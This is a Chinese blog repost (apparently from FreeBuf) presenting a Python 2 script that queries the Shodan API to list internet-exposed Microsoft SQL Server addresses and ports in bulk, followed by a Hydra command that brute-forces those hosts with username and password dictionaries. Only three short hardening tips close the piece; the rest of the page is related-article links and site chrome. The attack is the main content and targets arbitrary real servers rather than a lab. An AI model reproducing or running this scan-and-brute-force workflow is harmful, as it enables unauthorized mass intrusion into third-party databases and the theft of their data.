python攻击服务器_基于ShodanPython库的批量攻击实践

最新推荐文章于 2024-05-01 16:20:15 发布
最新推荐文章于 2024-05-01 16:20:15 发布
阅读量371 收藏
点赞数
文章标签: python攻击服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40001519/article/details/111460161
版权

拜读了xiaix关于Shodan的全面介绍:《Shodan新手入坑指南》,受益匪浅。SQL Server的弱口令入侵案例层出不穷,利用工具也大量存在,本文以MSSQL服务器为切入点,以解决批量目标发现为目标,介绍了一种基于Shodan Python库的攻击方法。希望能给有类似需求的同学提供参考。

0x01 基本思路

首先利用Shodan的Python库获取并实时处理MSSQL服务器IP及1434端口Banner,得到IP和MSSQL连接端口的组合列表;然后利用Hydra进行字典口令攻击。SQL Server服务使用两个端口:TCP-1433、UDP-1434。其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。    —— 百度百科-1433端口

0x02 实现脚本

实现过程详见脚本中的注释# -- coding:utf-8 --

# Python v2.7.10

# MSSQL.py

# Written by Gaearrow

import shodan

import sys

# API_KEY

API_KEY = "YOUR_API_KEY"

query = "product:\"Microsoft SQL Server\""

# 处理输入

if len(sys.argv) != 3:

print

print 'Usage: MSSQL.py '

sys.exit(1)

pagestart = int(sys.argv[1])

pageend = int(sys.argv[2])

try:

# 初始化输出文件

ofilename = 'page'+str(pagestart)+'to'+str(pageend)

ofilesrc = ofilename+'_src.txt'

ofileip = ofilename+'_ip.txt'

fsrc = open(ofilesrc,'w')

fip = open(ofileip,'w')

# 统计变量

numofport = 0

numofnoport = 0

rstlist = 0

# 逐页检索

api = shodan.Shodan(API_KEY)

rsttotal = api.count(query)

maxpage = (rsttotal['total']+99)/100

if pageend > maxpage:

pageend = maxpage

for page in range(pagestart,pageend+1):

result = api.search(query,page)

for mssql in result['matches']:

# 从Banner中解析MSSQL的连接端口

## 删除换行

ip = mssql['ip_str'].strip('\n')

## Ignore IPv6

if len(ip) > 15:

continue

## 跳过特殊字符

banner = mssql['data'][3:]

## 检查Banner

if banner.find('ServerName') < 0:

continue

pos = banner.find('tcp;')

if pos > 0:

strlist = banner[pos:].split(';')

if strlist[1].find('np') < 0:

### tcp;1234;np;..

ipport = ip+':'+strlist[1]

numofport = numofport + 1

else:

### tcp;np;..

ipport = ip+":1433"

numofnoport = numofnoport + 1

else:

### no 'tcp;'

ipport = ip+":1433"

numofnoport = numofnoport + 1

print >>fip,ipport

print >>fsrc,mssql['ip_str']

print >>fsrc,mssql['data'][3:]

rstlist = rstlist + 1

# 打印统计信息

print >>fsrc,'==================================='

print >>fsrc,'Shodan Summary Information'

print >>fsrc,'Query : ', query

print >>fsrc,'Total Results : ', rsttotal['total']

print >>fsrc,'List  Results : ', rstlist

print >>fsrc,'Page  Start   : ', pagestart

print >>fsrc,'Page  End     : ', pageend

print >>fsrc,'Port  Assigned   : ',numofport

print >>fsrc,'Port  Unassigned : ',numofnoport

print >>fsrc,'==================================='

except Exception as e:

print 'Error: %s' % e

sys.exit(1)

fsrc.close()

fip.close()

0x03 执行示例

执行环境root@kali2:~/app/mssqlnew# uname -a

Linux kali2 4.0.0-kali1-686-pae #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) i686 GNU/Linux

root@kali2:~/app/mssqlnew# python -V

Python 2.7.9

获取地址端口组合列表root@kali2:~/app/mssqlnew# python MSSQL.py 1 10

page1to10_src.txt

page1to10_ip.txt

hydra字典攻击

攻击耗时及成功率与用户、口令字典有紧密关系,网络带宽也影响速度。root@kali2:~/app/mssqlnew# hydra -L sqluser.dic -P sqlpass.dic -t 30 -M page1to10_ip.txt mssql

0x04 安全建议

设置MSSQL仅限本地连接

修改MSSQL的默认连接端口

分级配置各类数据库用户权限

*本文作者:gaearrow,转载请注明来自FreeBuf.COM

weixin_40001519
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 二十六.Shodan搜索引擎详解及Python命令行调用
杨秀璋的专栏
11-19 2万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Web安全学习路线,并实现了最简单的木马和病毒代码。这篇文章将详细讲述Shodan搜索引擎的基本用法及Python命令行,具体内容包括Shodan获取指定IP地址信息、Shodan获取账号信息、Shodan获取自身外部IP地址、Shodan检测是否有蜜罐等。
shodan python
devil8123665的博客
04-28 947
为了开始使用Shodan的Python,首先要确保你已经收到了API密钥。一旦完成,就可以通过以下方法来安装: (注:API密钥可以通过注册shodan账户获得) $ easy_install shodan 升级到最新版本: $ easy_install -U shodan 由于向后兼容的特性,所以更新始终是安全的。通常,的新版本仅仅意味着有新的方法/特性可用。 连接到api 我们的代码中需要做的第一件事是初始化API对象: import shodan SHODAN_API_KEY
2024年网安最新Python语言在黑客攻击中的应用_python 黑客攻击代码(1)
最新发布
2401_84301315的博客
05-01 982
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
python3快速入门
06-15
Python3 简介Python 是一个高层次的结合了解释性、编译性、互动性和面向对象的脚本语言。Python 的设计具有很强的可读性,相比其他语言经常使用英文关键字,其他语言的一些标点符号,它具有比其他语言更有特色语法结构。Python 是一种解释型语言: 这意味着开发过程中没有了编译这个环节。类似于PHP和Perl语言。Python 是交互式语言: 这意味着,您可以在一个 Python 提示符 >>> 后直接执行代码。Python 是面向对象语言: 这意味着Python支持面向对象的风格或代码封装在对象的编程技术。Python 是初学者的语言:Python 对初级程序员而言,是一种伟大的语言,它支持广泛的应用程序开发,从简单的文字处理到 WWW 浏览器再到游戏。
Python黑客攻击的几种技术,你得了解一下
weixin_58753619的博客
07-29 2769
Python提供了丰富的模块,几乎可以直接用于任何黑客领域。对于黑客模块没有提供的区域,可以使用c类型调用操作系统提供的本机API。简而言之,Python可以用于攻击几乎任何领域,如应用程序、Web、网络、系统等。下面描述每个领域中的Python黑客技术。应用程序黑客您可以将任何DLL或源代码插入正在运行的应用程序中,拦截用户的键盘输入以窃取密码。此外,黑客攻击代码还可以插入图片文件,传遍网络。Web黑客网络黑客攻击可以进行网络检查,搜索系统的开放端口,收集和分析网络上的数据包,进行网络嗅探。...
基于Shodan Python批量攻击实践 撒旦网
whatday的专栏
11-30 1326
拜读了xiaix关于Shodan的全面介绍:《Shodan新手入坑指南》,受益匪浅。SQL Server的弱口令入侵案例层出不穷,利用工具也大量存在,本文以MSSQL服务器为切入点,以解决批量目标发现为目标,介绍了一种基于Shodan Python攻击方法。希望能给有类似需求的同学提供参考。 0×01 基本思路 首先利用Shodan的Python获取并实时处理MSSQL服务器IP及143...
攻击_python_攻击检测_托攻击_
10-04
在SDLib-master这个压缩包中,可能包含了一套使用Python实现的网络安全工具,用于托攻击的检测和分析。通过深入研究这些代码,我们可以学习如何应用上述算法和概念,提高网络防御能力,有效对抗托攻击。对于想要...
基于Python的Crispr_Cas9 Oligos批量生成器.pdf
03-09
【基于Python的Crispr_Cas9 Oligos批量生成器】 Crispr/Cas9技术是一种革命性的基因编辑工具,源于细菌的CRISPR(Clustered Regularly Interspaced Short Palindromic Repeats)系统,它允许科学家对特定的DNA序列...
分析python服务器拒绝服务攻击代码
12-24
复制代码 代码如下:# -*- coding: cp936 -*-from scapy.all import *from threading import Thread,activeCountfrom random import randint class Loop(Thread): def __init__(self,remoteAddr): Thread.__init__...
源码_python登录_python_QQ批量登录_账号登录_批量登录_
10-04
Python编程领域,批量登录是一项常见的任务,尤其在自动化测试、数据分析或者运维场景下。本项目专注于使用Python实现QQ账号的批量登录功能,这涉及到网络请求、数据加密、模拟登录等多个知识点。 首先,我们需要...
rsa共模攻击_rsa共模攻击_pythonrsa共模_rsa攻击方式_rsapython_rsa共模_
09-29
**Python RSA与共模攻击:** 在Python中,可以使用`pycryptodome`实现RSA算法。在进行共模攻击时,需要编写代码来模拟加密过程,计算c1和c2,然后使用数论方法来解密。例如,`共模攻击1.py`、`共模攻击2-1.py`、...
python 入侵服务器_Python-常用 Linux 命令的基本使用
weixin_42299801的博客
03-01 158
操作系统作用:管理好硬件设备,让软件可以和硬件发生交互类型桌面操作系统Windowsmacoslinux服务器操作系统linuxWindows server嵌入式操作系统Linux移动设备操作系统iOSAndroid内核和发行版Linux内核就是系统的心脏 只有一个版本发行版就是Linux演变而生有无数个版本,例如Ubuntu,Redhat,DebianLinux目录结构windows 是单用户操...
Python利用shadon进行信息收集
她叫常玉莹
10-28 971
常用shodan函数 shodan_api.count(query,facets=None) 查询结果数量 shodan_api.host(ip,history=False):获取一个IP的详细信息 shodan_api.port():获取Shodan可查询的端口号 shodan_api.protocols():获取Shodan可查询的协议 shodan_api.services():获取Shodan可查询的服务 shodan_api.scan(ips,force=False):使用Shodan进行扫描,i
白帽黑客网络攻防与Python编程
10-26
为什么学网络安全?1. 市场巨大每年各安全厂商收入高达400亿左右,随着5G的发展,万物互联时代,市场将进一步扩大。2. 薪资高网安人才的匮乏,用人开出招聘薪资往往高于求职者的预期。3. 靠能力说话在网络安全专业,专业技能竞争力要远高于学历本身。在网安专业只看能力不看学历也成了大家公认的原则。网络安全未来10年的发展前景现代人的生活与网络息息相关,个人、企业信息的安全显示尤为重要,2018年报告的信息安全事件比2017年有所增加,一年几千万次。应对网络安全挑战,已越来越被重视。不管你是否从事网络安全行业相关工作,信息安全都显得越来越重要。 本套教程采用最新版的Kali Linux系统为基础进行讲解,减少大家的入门难度,紧跟技术发展的步伐。 注意:视频教学内容仅用于网络安全渗透测试。其他行为,自己承担相应的责任,与作者无关。  
Python scapy实现一个简易arp攻击脚本
lihui的服务器技术博客
08-10 4966
Pip3 安装: apt-get install python3-pip scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。 scapy的安装在Linux非常便利,但在Windows下比较复杂。 以下假定读者使用的是Ubuntu Linux 和 Python 3 环境。 scapy的安装在Linux下非常...
python渗透攻击
weixin_50699777的博客
04-01 5802
文章目录前言一、拒绝服务攻击1.含义2.数据链路层的拒绝服务攻击3.网络层的拒绝服务攻击4.传输层的拒绝服务攻击5.应用层的拒绝服务攻击二、身份认证攻击1.简单网络服务攻击的认证2.破解密码字典3.FTP暴力破解模块三、网络嗅探与欺骗1.网络数据嗅探2.ARP的原理与缺陷 前言 这是Python渗透测试编程技术,基于python模块是实现的 一、拒绝服务攻击 1.含义 拒绝服务攻击即是攻击者想办法让目标机器停止提供服务,是黑客常用的攻击手段之一。 拒绝服务攻击并不是一个攻击方式,而是一类具有相似特征的攻击
[网络安全自学篇] 十七.Python攻防之构建Web目录扫描器及ip代理池(四)
热门推荐
杨秀璋的专栏
10-11 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Python弱口令攻击、自定义字典生成,调用Python的exrex实现,并结合Selenium和BurpSuite实现网站暴案例;本文将分析Python攻防之构建Web目录扫描器,实现IP代理池。本文参考了爱春秋ADO老师的课程内容,这里也推荐大家观看他Bilibili和ichunqiu的课程,同时也结合了作者之前的编程经验进行讲解。
python框架漏洞_基于Python3的漏洞检测工具 ( Python3 插件式框架 )
06-06
对于基于Python3的漏洞检测工具,可以采用插件式框架来实现对不同漏洞的检测。...总之,基于Python3的漏洞检测工具需要仔细考虑安全问题,并采取适当的安全措施,以确保其能够可靠地检测漏洞,而不会成为攻击者的入口。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值